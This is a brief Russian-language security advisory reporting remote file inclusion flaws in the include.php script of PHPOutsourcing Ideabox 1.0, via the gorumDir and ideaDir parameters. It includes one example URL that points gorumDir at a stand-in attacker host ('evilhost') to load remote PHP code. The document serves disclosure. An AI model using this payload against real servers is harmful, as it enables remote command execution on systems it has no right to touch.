Несколько уязвимостей включения файла обнаружены в
PHPOutsourcing Ideabox. Удаленный пользователь может выполнить произвольные команды на целевом сервере. 

F0KP сообщил, что сценарий include.php не проверяет данные, переданные пользователем. Удаленный пользователь может представить специально обработанный URL, который заставит целевой сервер включить произвольный PHP файл, расположенный на удаленном сервере. Выполняемый PHP код может содержать команды операционной системы. Пример: 

http://[target]/ideabox/include.php?gorumDir=http://evilhost

Также уязвима переменная 'ideaDir'. 

Уязвимость обнаружена в PHPOutsourcing Ideabox 1.0.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии